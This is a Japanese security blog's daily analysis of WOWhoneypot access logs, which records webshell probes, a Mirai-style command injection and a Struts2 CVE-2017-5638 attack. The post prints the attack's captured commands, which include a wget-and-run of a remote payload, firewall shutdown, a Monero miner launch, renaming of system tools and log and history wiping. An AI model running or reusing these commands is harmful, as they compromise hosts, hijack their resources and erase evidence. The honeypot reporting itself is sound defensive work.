S-Owl

S(ecurity)Owl

トップ > honeypot > ハニーポットのログ分析(2018/08/06)

ハニーポットのログ分析(2018/08/06)

honeypot

WOWhoneypotの2018/08/06(月)(運用64日目)の簡易分析です。
本日の総アクセス件数は 217件です。以下が全アクセスログです。

27 2018-08-06 GET /
21 2018-08-06 GET /index.action
7 2018-08-06 POST /qq.php
6 2018-08-06 POST /qaq.php
4 2018-08-06 POST /xx.php
4 2018-08-06 POST /q.php
2 2018-08-06 POST /zuoshou.php
2 2018-08-06 POST /yumo.php
2 2018-08-06 POST /yao.php
2 2018-08-06 POST /xw.php
2 2018-08-06 POST /xw1.php
2 2018-08-06 POST /xshell.php
2 2018-08-06 POST /xiao.php
2 2018-08-06 POST /xiaoma.php
2 2018-08-06 POST /wuwu11.php
2 2018-08-06 POST /wshell.php
2 2018-08-06 POST /w.php
2 2018-08-06 POST /weixiao.php
2 2018-08-06 POST /webslee.php
2 2018-08-06 POST /wc.php
2 2018-08-06 POST /wanan.php
2 2018-08-06 POST /system.php
2 2018-08-06 POST /ssaa.php
2 2018-08-06 POST /s.php
2 2018-08-06 POST /sheep.php
2 2018-08-06 POST /phpstudy.php
2 2018-08-06 POST /pe.php
2 2018-08-06 POST /mz.php
2 2018-08-06 POST /mx.php
2 2018-08-06 POST /min.php
2 2018-08-06 POST /log.php
2 2018-08-06 POST /lindex.php
2 2018-08-06 POST /l8.php
2 2018-08-06 POST /l7.php
2 2018-08-06 POST /hm.php
2 2018-08-06 POST /hh.php
2 2018-08-06 POST /feixiang.php
2 2018-08-06 POST /fack.php
2 2018-08-06 POST /defect.php
2 2018-08-06 POST /db_session.init.php
2 2018-08-06 POST /db.init.php
2 2018-08-06 POST /db__.init.php
2 2018-08-06 POST /data.php
2 2018-08-06 POST /conflg.php
2 2018-08-06 POST /cmd.php
2 2018-08-06 POST /cainiao.php
2 2018-08-06 POST /aw.php
2 2018-08-06 POST /aotu.php
2 2018-08-06 POST /angge.php
2 2018-08-06 POST /ak47.php
2 2018-08-06 POST /9678.php
2 2018-08-06 POST /56.php
2 2018-08-06 POST /12.php
2 2018-08-06 GET /webdav/
2 2018-08-06 GET hxxp://114.215.207[.]183:83/index.php
2 2018-08-06 GET /cmd.php
2 2018-08-06 CONNECT 133.130.126.119:43
1 2018-08-06 PROPFIND /
1 2018-08-06 POST /zuo.php
1 2018-08-06 POST /xiaomar.php
1 2018-08-06 POST /wp-admins.php
1 2018-08-06 POST /wan.php
1 2018-08-06 POST /test.php
1 2018-08-06 POST /qwe.php
1 2018-08-06 POST /m.php?pbid=open
1 2018-08-06 POST /ip.php
1 2018-08-06 POST /infoo.php
1 2018-08-06 POST /h1.php
1 2018-08-06 POST /bak.php
1 2018-08-06 POST /ak.php
1 2018-08-06 POST /3.php
1 2018-08-06 POST /1213.php
1 2018-08-06 GET /z.php
1 2018-08-06 GET /x.php
1 2018-08-06 GET /xmlrpc.php
1 2018-08-06 GET /wpo.php
1 2018-08-06 GET /wp-config.php
1 2018-08-06 GET /uploader.php
1 2018-08-06 GET /text.php
1 2018-08-06 GET /test.php
1 2018-08-06 GET /shell.php
1 2018-08-06 GET /_query.php
1 2018-08-06 GET /muhstiks.php
1 2018-08-06 GET /muhstik.php
1 2018-08-06 GET /muhstik-dpr.php
1 2018-08-06 GET /muhstik2.php
1 2018-08-06 GET /lol.php
1 2018-08-06 GET /log.php
1 2018-08-06 GET /logon.php
1 2018-08-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-08-06 GET /license.php
1 2018-08-06 GET /lala.php
1 2018-08-06 GET /lala-dpr.php
1 2018-08-06 GET /java.php
1 2018-08-06 GET /help.php
1 2018-08-06 GET /help-e.php
1 2018-08-06 GET /desktop.ini.php
1 2018-08-06 GET /db_pma.php
1 2018-08-06 GET /db_cts.php
1 2018-08-06 GET /cmx.php
1 2018-08-06 GET /cmv.php
1 2018-08-06 GET /cmdd.php
1 2018-08-06 GET /appserv.php 

phpMyAdmin関連(0件)とphpに対する特定のアクセス(160件)と/へのアクセスを除外したアクセス数です。

21 2018-08-06 GET /index.action
2 2018-08-06 GET /webdav/
2 2018-08-06 GET hxxp://114.215.207[.]183:83/index.php
2 2018-08-06 CONNECT 133.130.126[.]119:43
1 2018-08-06 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://46.166.185[.]42/e%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$

phpファイルに対するPOST/GETは計2IPから来ていました。片方のIPのみGETに対するアクセスもありました。
これらのアクセスはすべて「User-Agent: Mozilla/5.0」となっているのが特徴です。最近ではPOST通信では「変数=die(md5('PHP'));」となっています。

昨日同様、Struts2脆弱性(CVE-2017-5638)を突く攻撃も来ています。全て同一IPで丁寧に攻撃コードを複数回に分けて投げてきていました。コマンドの部分のみ、抜粋すると以下となります。Moneroのコインマイナーを埋め込む動作と思われます。

(#cmd='whoami')
(#cmd='service iptables stop')
(#cmd='/etc/init.d/iptables stop')
(#cmd='SuSEfirewall2 stop')
(#cmd='reSuSEfirewall2 stop')
(#cmd='pkill -9 java.log;pkill -9 dmw;pkill -9 dwm;pkill -9 abcfg;pkiil -9 MAnager;pkill -9 hackqz;pkill -9 juschad;pkill -9 jusched;pkill -9 linux;pkill -9 Ashh;pkill -9 ._20170423Linux;pkill -9 bnn;pkill -9 cnnc;pkill -9 dcsysn;pkill -9 linux;pkill -9 lsess;pkill -9 sest;pkill -9 sss;pkill -9 s.ssh;pkill -9 s.ssh.1;pkill -9 svchese;pkill -9 system;pkill -9 systemi;pkill -9 systeml;pkill -9 systeml.1;pkill -9 systemt;pkill -9 systemt.1;pkill -9 winlogon')
(#cmd='chattr -i dwm;chattr -i dmw;chattr -i juschad;chattr -i jusched;chattr -i linux;chattr -i Ashh;chattr -i hackqz;chattr -i MAnager;chattr -i abcfg')
(#cmd='rm -f java.log.1;rm -f java.log.2;rm -f java.log.3;rm-f java.log.4;rm -f 03618.log.1;rm -f 03618.log.2;rm -rf hackqz;rm -rf MAnager;rm -rf abcfg;rm -rf dwm;rm -rf dmw;rm -rf Lin.1;rm -rf jusched;rm -rf juschad;rm -rf Ashh;rm -rf ._20170423Linux;rm -rf bnn;rm -rf cnnc;rm -rf dcsysn;rm -rf linux;rm -rf lsess;rm -rf sest;rm -rf sss;rm -rf s.ssh;rm -rf s.ssh.1;rm -rf svchese;rm -rf system;rm -rf systemi;rm -rf systeml;rm -rf systeml.1;rm -rf systemt;rm -rf systemt.1;rm -rf winlogon')
(#cmd='wget http://119.188.182[.]178:5198/javas.log')
(#cmd='chmod +x javas.log')
(#cmd='nohup /javas.log -B -a cryptonight -o stratum+tcp://monerohash[.]com:3333 -u 45NoK9sYEDS5hjiBdxTaYja9JnETCvusxDNtxf1wxHt2AM4qEav94uRhhWCEdHJWQJ1WJ5UfJmEfVXRA6kYvFQC7Pgfq5KR -p x > /dev/null 2>&1')
(#cmd='pkill -9 javas.log.1;pkill -9 javas.log.2;pkill -9 javas.log.3;pkill -9 javas.log.4;pkill -9 javas.log.5')
(#cmd='mv /bin/netstat /bin/tstat')
(#cmd='mv /usr/bin/wget /usr/bin/scet')
(#cmd='mv /usr/bin/scp /usr/bin/lcp')
(#cmd='mv /usr/bin/curl /usr/bin/cuy')
(#cmd='echo > /var/log/wtmp ')
(#cmd='echo >/var/log/wtmp')
(#cmd='echo > ./.bash_history')
(#cmd='history -c')
(#cmd='history -c')

その他はWebDAVの調査や不正中継の調査、Mirai亜種等でした。

 

本日のハンティングログは以下です。Mirai亜種とStruts2脆弱性を攻撃するものです。

1 2018-08-06 wget hxxp://46.166.185[.]42/e
1 2018-08-06 wget hxxp://119.188.182[.]178:5198/javas.log

 

以上です。